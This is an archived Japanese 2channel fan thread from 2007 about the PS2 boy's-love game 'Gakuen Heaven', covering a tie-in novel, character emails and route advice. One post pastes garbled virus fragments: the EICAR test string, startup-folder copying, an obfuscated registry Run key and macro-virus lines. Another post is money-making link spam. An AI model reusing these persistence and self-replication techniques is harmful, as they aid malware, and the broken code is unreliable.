5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BL@PS2『学園ヘヴン-BOY'S LOVE SCRAMBLE-』Part12

1 :名無しって呼んでいいか?:2007/06/18(月) 07:39:56 ID:???
PS2「学園ヘヴン BOY'S LOVE SCRAMBLE」
2003年11月27日発売 全年齢対象BLゲー。
豪華声優・完全フルボイス・10人の攻略キャラクター。
2005年2月24日「学園ヘヴン おかわりっ!」PS2版が発売。
BEST版(廉価版)も発売中。
携帯でも配信中。携帯オリジナルコンテンツ中嶋誕生日話アリ。
現在ドラマCD4枚組・キャラブック3弾・トレカ4弾が発売中
2007年6月に小説「学園ヘヴン 七条編」
2007年7月にマンガ「学園ヘヴン 遠藤編」が発売。
2006年4月1日よりAT-Xにてアニメ放送(現在は終了)
アニメのDVDも現在発売中。
そんな「学園へヴン」について語りましょう。

■前スレ
BL@PS2『学園ヘヴン-BOY'S LOVE SCRAMBLE-』Part11
http://game12.2ch.net/test/read.cgi/ggirl/1175877370/


2 :名無しって呼んでいいか?:2007/06/18(月) 07:41:12 ID:???
★【ゲーム完全ネタバレOK】★
PC版は対象外。PS2版発売済ゲームに関しては、完全ネタバレOKです。
関連商品(CD、本、トレカなど)は ネタバレ解禁令が出るまでは、
ネタバレ内容=メル欄推奨 。

良い子は、ネタバレには気をつけましょう(  ´ー`・)
もしネタバレを発見しても、過剰な反応は止めましょう。
スレを荒らしたり、キャラ・カプ叩きをする悪い子はスルーしましょう。
スルーできない子も荒らしです。
悪い子には、中嶋のお仕置きが待ってます。(□□?)


《お仕置きの一例》

ティーカップの刑
  〇  〇
 (□□−)
Гu ̄ ̄ ̄u ̄/_
\      口|
 \    /  ̄
   ̄ ̄ ̄ ̄ ̄


★★悪い子にならないために★★
・荒らしは徹底的にスルーして放置。
・放置しきれない方は「かちゅ〜しゃ」「ギコナビ」等の2ちゃんねる専用ブラウザの使用をお勧めします。
 不快な発言はNGワード等で視界から消せるのでストレスの軽減になります
 【このスレには特定の発言を繰り返す厨がいます。その発言消去の為のお勧めNGワードは>>3
 その他ブラウザの機能や脳内スルーで自衛する事もスレを楽しむためのポイント。
・このスレはゲーム等内容やそこから派生する内容を語りあう場所です
 「ゲーム本編から著しく離れた二次創作」「なりきり書き込み」等同人的行為はどっか他所いってやってください

■関連メーカー
インターチャネル(PS2版メーカー)
http://www.interchannel.jp/game/indexG.html

ビジュアルアーツ★Motto(携帯版)
http://motto.product.co.jp/

Spray(PC原作版メーカー・※18禁)

3 :名無しって呼んでいいか?:2007/06/18(月) 07:43:22 ID:???
■お勧めNGワード
・・・このスレに頻出する通称「郁厨」の発言の大多数をあぼーんするワードです
使用は個人の自己責任でお願い致します。
・かおるちゃん
・かおるひめ
・だーりんず
・のうなし
・わかひめ
・しゅがー
(注・書き込み時には変換する)

その他、有用な単語を登録することをお勧めいたしますが、あまり登録単語が多いと
荒らし外の発言も消える事がありますので、ご注意ください。

携帯用専用ブラウザ
http://i.i2ch.net/x/-CX6.lN!aboc=%88%E8%82%BF%82%E1%82%F1&mail=sage/i

スレ立ては980を目安に行ってください。

4 :名無しって呼んでいいか?:2007/06/18(月) 08:15:28 ID:???
1乙です!

5 :名無しって呼んでいいか?:2007/06/18(月) 08:44:39 ID:???
>1
乙華麗!!

6 :名無しって呼んでいいか?:2007/06/18(月) 12:41:19 ID:???
1さん乙です。

七条編小説、ご馳走様でした。
あと10年は萌えられます。


7 :名無しって呼んでいいか?:2007/06/18(月) 17:18:11 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


8 :名無しって呼んでいいか?:2007/06/18(月) 19:01:57 ID:???
DOSの知識もない奴がただコピペするだけなんてバカ丸出しだな。

9 :名無しって呼んでいいか?:2007/06/18(月) 20:23:00 ID:???
前スレ>>1000陰湿だな。

10 :名無しって呼んでいいか?:2007/06/18(月) 21:22:05 ID:???
うーん、和啓の漫画の最終回の雑誌表紙で流し目してる
リジチョと小説の臣の流し目が一緒だ〜。
何か色っぽいなぁ。

11 :名無しって呼んでいいか?:2007/06/18(月) 21:54:09 ID:???
>>1乙(*´д`)


小説かなりよかったなぁ
旅行中啓太に手出さないなんて結構紳士ですな、七条さんは。

12 :名無しって呼んでいいか?:2007/06/18(月) 22:13:06 ID:???
七条さん小説が売ってるのを見たんだが、
1冊だけ帯がない状態でシュリンク(ビニール)包装されて売ってた。
それ見て「もう2版!?」と一瞬思ってしまった…。
チラ裏スマソ。

13 :名無しって呼んでいいか?:2007/06/18(月) 22:48:32 ID:???
七条小説よかった
本命から乗り換えそうになったよ

シナリオライターっぽい文章じゃなくて「小説」って感じがしたのもよかった
これ書いたのってどっからきた人なんだろ
ヘヴン虹とかやってた人なのかな

14 :名無しって呼んでいいか?:2007/06/19(火) 00:33:57 ID:???
なんか賞を取った新人さん(?)みたいだけど
今のところ単行本は無いっぽいね>小説の人

15 :名無しって呼んでいいか?:2007/06/19(火) 01:47:26 ID:???
王様の卒業式〜啓太2年生に進級、新入生入ってくる、みたいな
啓太が年下攻にいろいろやられるゲームとか出ないんですか

16 :名無しって呼んでいいか?:2007/06/19(火) 03:37:23 ID:???
出ません

17 :名無しって呼んでいいか?:2007/06/19(火) 03:58:31 ID:???
3年が卒業しちゃうとごっそり素敵メンズが抜けちゃうからなー
中等部でもあれば良かったんだろうけど(何が良いのかわからんがw)

18 :名無しって呼んでいいか?:2007/06/19(火) 05:37:59 ID:???
【気軽にお小遣い稼ぎませんか?】
用意するものはパソコン一台だけ。気軽に始められます。
いくら儲かるかは自分次第!!
【簡単説明】
@まず↓のサイトで無料会員登録します。
http://atk.jp/yhqo
Aポイントを稼ぎます。稼ぎ方はログインして[すぐゲッチュ」と書いてあるから、
そこの懸賞応募をします。応募すればするほどポイントもらえるよ
B3000ポイント〜電子マネーや現金に交換できます。
 3000ポイント→300円 30000ポイント→3000円
Cポイントバンクにポイントを「交換」してください。
 トップの右上に「交換」というところがあるのでそこでやってね。
 頑張れば月○万単位で稼げます。
Damazonポイントや、webmoneyに交換して買い物したり、銀行へ現金として振り込み
 ちょっとしたお小遣いとして活用してください。

19 :名無しって呼んでいいか?:2007/06/19(火) 08:53:55 ID:???
3年生×啓太はほんのちょっとしか一緒に居れないから切ないね。
リジチョずるいよ、ずるいよリジチョ。


20 :名無しって呼んでいいか?:2007/06/19(火) 09:54:49 ID:???
和希と啓太の部屋がお隣ってアニメ以降の設定?
ゲームでもそう?

21 :名無しって呼んでいいか?:2007/06/19(火) 10:50:50 ID:???
ゲームではそれらしい描写は出てこないような…
どうだったかな。
キャラブックでも見た記憶ないな。

22 :名無しって呼んでいいか?:2007/06/19(火) 10:51:57 ID:???
タメ萌の自分に隠しキャラの同級生を入れて続編を…
人気出ないだろうけどネタにはなりそうだ

23 :名無しって呼んでいいか?:2007/06/19(火) 10:53:15 ID:???
ゲームは啓太が「あいつの部屋どこだっけ?」みたいな事言ってたよ

24 :名無しって呼んでいいか?:2007/06/19(火) 12:15:34 ID:???
>22
そこで藤田ですよ

25 :名無しって呼んでいいか?:2007/06/19(火) 12:31:02 ID:???
>>24
藤田バロッシュw


26 :名無しって呼んでいいか?:2007/06/19(火) 13:17:14 ID:???
河本・石塚・丹羽父辺り渋面子の参入キボン
EDまでいかなくてもイチャコラエピがあればな
新キャラなら新副理事が妥当?

27 :名無しって呼んでいいか?:2007/06/19(火) 13:25:19 ID:???
嫁がいるから丹羽父はムリだろうー

28 :名無しって呼んでいいか?:2007/06/19(火) 13:42:11 ID:???
>27
一方的に啓太が憧れて王様ヤキモチ もしくは…
やたら仲の良すぎるように思える父と嫁(啓太)の関係に悶々する王様も萌え

29 :名無しって呼んでいいか?:2007/06/19(火) 13:50:54 ID:???
ミドルスキーなんで丹羽父・河本・和希父を落したいw
しかし啓太がこの三人を落すと、河本さん以外は高確率で修羅場に…

30 :名無しって呼んでいいか?:2007/06/19(火) 13:52:34 ID:???
自分も河本さん・石塚さん・丹羽父辺り渋ぶ面子の参入は望むけど、27に禿同。
イチャコラエピがなくても、話(岩井さん・和希・丹羽)に絡んで欲しいとオモ。

>>28
それはありそうー。


丹羽父の中の人のお歳を知ってビックリ。

31 :名無しって呼んでいいか?:2007/06/19(火) 19:39:52 ID:???
今のままのメンバーで続編キボン

32 :名無しって呼んでいいか?:2007/06/19(火) 22:29:18 ID:???
>>30
かなりお年を召した方みたいだよね。
テレビのナレーションのイメージが強すぎて慣れるの時間かかったな…

33 :名無しって呼んでいいか?:2007/06/19(火) 23:45:02 ID:???
鈴菱グループが大学を作っちゃえば無問題。
もう一つ人工島作ってそこでも学園生活送っちゃいなyo!

34 :名無しって呼んでいいか?:2007/06/19(火) 23:53:57 ID:???
鬼 才 現 る

35 :名無しって呼んでいいか?:2007/06/20(水) 00:41:47 ID:???
>>33
ネ申


36 :名無しって呼んでいいか?:2007/06/20(水) 01:56:32 ID:???
>33
リジチョ!!そうおっしゃって下さる日を待ち望んでおりました!!

37 :名無しって呼んでいいか?:2007/06/20(水) 06:05:54 ID:???
大学ならあんまり気合入れて若作りしなくてよさそう。
良かったね理事長w

38 :名無しって呼んでいいか?:2007/06/20(水) 08:01:54 ID:???
大学かー。
学科はどんなのがあるんだろ?

39 :名無しって呼んでいいか?:2007/06/20(水) 12:36:28 ID:???
家庭科(手芸科)

40 :名無しって呼んでいいか?:2007/06/20(水) 12:53:19 ID:???
でもBL大学あっても3年生は岩井さん以外東大行く希ガス。
七条さんは卒業後一年間何もしないで啓太が卒業したら
当然のように同じ大学行く希ガス。

41 :名無しって呼んでいいか?:2007/06/20(水) 13:08:46 ID:???
高校3年間という限られた時間だから良いのだよ。
さすがに7年島に隔離したら色々腐るw

42 :名無しって呼んでいいか?:2007/06/20(水) 14:59:01 ID:???
臣からメールキター!!テラモエス

43 :名無しって呼んでいいか?:2007/06/20(水) 15:04:39 ID:???
ナイショの一週間をちょっとだけって・・・
あれ以上に何かあったとでもいうのかー!>メルマガ

44 :名無しって呼んでいいか?:2007/06/20(水) 15:05:27 ID:???
臣メールワラタ

45 :名無しって呼んでいいか?:2007/06/20(水) 15:12:55 ID:???
東大か海外の大学へ行ってしまいそうだなぁ。
勝手な学部予想

丹羽→政治経済 警察官僚目指すなら、法?
中嶋→法
篠宮→医
岩井→油絵

46 :名無しって呼んでいいか?:2007/06/20(水) 15:28:57 ID:???
>>42->>44
それって七条さんを好きキャラに
設定してないと来ないのかな?
啓太で登録したけど小説2冊買ったんだぜ( ´・ω・)

47 :名無しって呼んでいいか?:2007/06/20(水) 15:32:45 ID:???
>>46
好きな伽羅は郁ちゃんだけど臣から来たんだぜ

48 :名無しって呼んでいいか?:2007/06/20(水) 15:46:47 ID:???
時間差があるんじゃないかと思うよ>46
自分アドレス3つ分登録しているけど
日単位でずれるときもあるし

49 :名無しって呼んでいいか?:2007/06/20(水) 15:50:23 ID:???
>>47->>48
ありがとう。
キャラ関係ないなら一安心だ。
のんびり全裸で待つことにする。


50 :名無しって呼んでいいか?:2007/06/20(水) 18:36:21 ID:???
全裸流行ってんな全裸ww(´Д`*)

51 :名無しって呼んでいいか?:2007/06/20(水) 18:45:27 ID:???
>>49
ちょっw
何故に全裸?

自分のトコは七条さんからのメールがまだ来ない…orz

七条さんを見てると、某ゲームのキャラ(初代・CVは七条さんと同じ坪井さん)を連想してしまうよ…。

52 :名無しって呼んでいいか?:2007/06/20(水) 18:52:59 ID:???
好きキャラを和希にしたのに臣さんから届いて少しビビったwww

小説、同人ぽくなくて面白かった。

53 :名無しって呼んでいいか?:2007/06/20(水) 19:18:06 ID:???
うちもまだこないなあ…
最初好きキャラを中嶋さんにしてるからかと思ったけど
問題ないみたいで良かった。
ぼちぼち自分も全裸で正座しとくよ。

54 :名無しって呼んでいいか?:2007/06/20(水) 19:55:37 ID:???
つタオルケット

夜はまだ冷えますよ。

55 :名無しって呼んでいいか?:2007/06/20(水) 21:07:14 ID:???
好きなキャラ中嶋にしたから
メール来なっ(´;ω;`)

56 :名無しって呼んでいいか?:2007/06/20(水) 21:22:23 ID:???
好きなキャラ丹羽にした自分が通りますよ。
七条さんからのメールがやっとキター!

57 :名無しって呼んでいいか?:2007/06/20(水) 21:22:46 ID:???
>>55
泣くな。
>>48の言うように時間差でそのうち来るよ。
てかむしろ臣は中嶋さんにこそ送りたいと思うよw

58 :名無しって呼んでいいか?:2007/06/20(水) 22:31:22 ID:???
私好きなキャラ中嶋さんだけど
臣から来たよ。
地域とかも関係するのかな?
因みにうちは関東です。

59 :名無しって呼んでいいか?:2007/06/20(水) 22:56:49 ID:???
七条メールだけで激しく萌えた・・・!
でも、まだ本屋に行けてない。
とりあえず今夜は全裸で内容を妄想しつつ寝る!

>>57
確かに七条さんの好きそうな嫌がらせだなwww>ヒデにこのメール送信

60 :名無しって呼んでいいか?:2007/06/21(木) 01:36:32 ID:???
臣メールたった今来た!
これで安心して寝れるよ…

61 :名無しって呼んでいいか?:2007/06/21(木) 07:34:25 ID:???
全裸祭ハゲワロス

62 :名無しって呼んでいいか?:2007/06/21(木) 09:23:05 ID:???
臣からメールまだ来ない(´・ω・`)全裸で

63 :名無しって呼んでいいか?:2007/06/21(木) 09:55:13 ID:???
おかわりっ!をこれから始めようと思うんだけど…。
誰から始めたらいいの?
真相解明ルート(?)の篠宮さんは最初と最後のどっちにやるべき?

64 :名無しって呼んでいいか?:2007/06/21(木) 11:26:49 ID:???
篠宮さんスキーで最初に攻略した自分が通りますよっと。
あなたが篠宮さん好きで、美味しいものを最後まで取っとく
タイプなら最後、先に頂くタイプなら先に。

別に誰からでも構わないと思うよ。
おかわりは前より真相ルートは重要じゃないし。

65 :名無しって呼んでいいか?:2007/06/21(木) 11:45:52 ID:???
篠宮ルートは、滝ルートやったかやってないかで
会話が変化したような…

他にもあったっけか?

66 :名無しって呼んでいいか?:2007/06/21(木) 11:49:13 ID:???
>>59
あの七条メールは激しく萌えるよね!

小説読んだ後だった自分は、あの小説で七啓がかなりの勢いで
好きカプ上位に上がってたんで、余計萌えたw
是非早く読んで欲しい!


67 :名無しって呼んでいいか?:2007/06/21(木) 13:24:28 ID:???
>>63
各ルートの自分の印象はこんな感じ
カワユス:篠宮・滝
カコヨス:王様・女王様
乙女:中島
マニアック:七条
甘ーい:和希・成瀬
(゚д゚):海野
(´;ω;`):岩井

番外:丹羽父カコ(・∀・)イイ!おまけの理事長自重汁w

68 :名無しって呼んでいいか?:2007/06/21(木) 13:31:34 ID:???
篠宮ルートは、滝ルートを通っているか否かで
図書室での『指輪のはずし方』の会話が違う

篠宮スキーな自分は、最初と最後にやって会話の違いを楽しんだw
滝ルート既読後の会話は、相変わらずのテレ甘っぷりで悶えるぞ

69 :名無しって呼んでいいか?:2007/06/21(木) 13:40:01 ID:???
臣メールやっとキター
ノロケメールにやにやが止まらん

70 :名無しって呼んでいいか?:2007/06/21(木) 14:13:09 ID:???
中嶋編コミクス発売の時も
キャラメール来た?

71 :名無しって呼んでいいか?:2007/06/21(木) 14:42:43 ID:???
なかったぽい>中嶋メール
第1回のメルマガが配信されたのがコミックス発売後だったからかな

72 :名無しって呼んでいいか?:2007/06/21(木) 15:30:00 ID:???
>71
そっか。ありがとう。


73 :名無しって呼んでいいか?:2007/06/21(木) 15:35:56 ID:???
ついでに今までメルマガでメールがあったヘヴンキャラ
(お正月・誕生日除く)を書いてみる。

・和希…小説「遠藤編」復刊告知
・女王様…DVD2巻リリース告知
・啓太…PS2廉価版告知
・成瀬(+双子)…DVD3巻リリース告知
・王様…PS2「おかわり」廉価版告知
・篠宮(+岩井)…DVD4巻リリース告知+メルマガ文字化けのお詫び
・松岡(+海野、トノサマ)…DVD5巻リリース告知
・啓太+和希…DVD最終巻リリース告知
・啓太…ベルラジCDリリース告知(+クリスマス)
・七条…小説「七条編」告知

手元に残っているので書いてみたけど捨てちゃってるのあるのかなぁ。
中嶋と滝はメルマガには1回も出てきてない?

74 :名無しって呼んでいいか?:2007/06/21(木) 17:02:48 ID:???
>73
さっきバックナンバーの号外全部取り寄せてそれ全部見たw
うちのプロバイダが悪いのか何らかの不具合で
号外の半分近く届いてなくて初めて見たのがいっぱいあってorz



75 :名無しって呼んでいいか?:2007/06/21(木) 17:15:08 ID:???
>>74
自分も結構歯抜けありで、
お正月メールも届かなかった( ´・ω・)



76 :名無しって呼んでいいか?:2007/06/21(木) 20:14:07 ID:???
ここ見てさっきメルマガ登録したが
バックナンバーに話題の七条メールがないorz

しかしスプレの小説監修ってどの程度なんだろうな
作者泣くほどしんどかったってどんだけww

77 :名無しって呼んでいいか?:2007/06/21(木) 22:05:27 ID:???
小説発売で七条メールが届いたってことは、
コミクス発売で遠藤メールが届くってことだろうな。
今からwktk

78 :名無しって呼んでいいか?:2007/06/21(木) 22:11:52 ID:???
鈴菱っぽいメールでおねがいne!>和希

79 :名無しって呼んでいいか?:2007/06/22(金) 00:44:12 ID:???
啓太メールかもしれないぞ

80 :名無しって呼んでいいか?:2007/06/22(金) 01:03:05 ID:???
意表をついて、鈴菱パパと新副理事とか

81 :名無しって呼んでいいか?:2007/06/22(金) 01:13:56 ID:???
>>76
別にスプレの監修がすごくて泣いたわけじゃないんじゃないの?
デビュー作で原作ものなんて、それだけでもすごいプレッシャーな上に連載だから
締め切りも毎月あっただろうし、そういうの全て含めてしんどかったっつう事では?


82 :名無しって呼んでいいか?:2007/06/22(金) 08:58:34 ID:???
>>77
DVDの時みたいに
啓太&和希バカップルメールだと嬉しいな

83 :名無しって呼んでいいか?:2007/06/22(金) 11:25:17 ID:???
>76
しかも「TAMAMIたんじゃないなんてー」って少なからず思ってる人も多いし
重圧はかなりあっただろうな

84 :名無しって呼んでいいか?:2007/06/22(金) 11:42:04 ID:???
>七条さん小説
TAMAMIさんはスプレの例の新作等で忙しくて書けなかったんじゃ…?

85 :名無しって呼んでいいか?:2007/06/22(金) 11:50:49 ID:???
どうでもいいよ。

86 :名無しって呼んでいいか?:2007/06/22(金) 11:51:37 ID:T/UYSN1L
>>80
新副理事ありそうw

87 :名無しって呼んでいいか?:2007/06/22(金) 12:02:30 ID:???
今更だが新装版の和啓小説って書き下ろしあるのか!
ビブロス版持ってるから買わなかったけど
これは本屋に走らねば。


88 :名無しって呼んでいいか?:2007/06/22(金) 12:26:57 ID:???
書き下ろしじゃなくてトレカの再録

89 :名無しって呼んでいいか?:2007/06/22(金) 13:15:12 ID:???
>87
書き下ろしは表紙のみですよ

和啓絵は啓太から和希にくっついたり
絡んでる感じのが多くて萌える。



90 :名無しって呼んでいいか?:2007/06/22(金) 15:51:51 ID:???
>>89
一方的じゃなくて二人で寄り添って頬擦りし合ってる感じがイイよな

91 :名無しって呼んでいいか?:2007/06/22(金) 15:59:39 ID:???
和希に甘える啓太可愛過ぎ

92 :名無しって呼んでいいか?:2007/06/22(金) 16:12:55 ID:???
>>90
そうそう。
スリスリスリスリと猫かおまいら、っつー感じがイイ!

おかわりで中嶋さんにそんなにしがみつくなって
言われてる啓太も可愛い(´Д`*)


93 :名無しって呼んでいいか?:2007/06/22(金) 19:38:08 ID:???
つまり以上のレスをまとめると・・・・・

啓太テラカワユス

ってことでいいですね!

94 :名無しって呼んでいいか?:2007/06/22(金) 19:50:12 ID:???
皆カワユスでおk!


でも…啓太テラカワユス!

95 :名無しって呼んでいいか?:2007/06/22(金) 20:05:18 ID:???
ほんとお前ら啓太好きだなwwww

そういう私も啓太テラテラカワユス(*´д`)
大好き!

96 :名無しって呼んでいいか?:2007/06/22(金) 22:19:09 ID:???
+  ∧_∧  +
 (0°・∀・)モエモエテラテラ
 (0°∪ ∪ +
 と__)__) +


モットおかわり待受キタコレ
理事長援k(ry スチル待受欲しいよ

97 :名無しって呼んでいいか?:2007/06/22(金) 22:34:47 ID:???
画像サイズがデカすぎて携帯が拒否りやがる・・・・゚・(ノД`;)・゚・
>新しい待ち受け

98 :名無しって呼んでいいか?:2007/06/22(金) 23:07:23 ID:???
じゅぶじゅぶ
「……ね?」
「い、や……っ、あっ」

萌えー(;´Д`)

99 :名無しって呼んでいいか?:2007/06/23(土) 08:37:34 ID:???
>96
あれは援○スチルというのかwww


100 :名無しって呼んでいいか?:2007/06/23(土) 11:25:14 ID:???
>>97
>新しい待ち受け
ナカーマ。
自分の携帯もそうなるよ…orz
・゜・(つД⊂)・゜・
あれってもしかして…最新機種じゃないとダメ?
見れないんじゃ、かかった20Pがもったいない…。

188 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)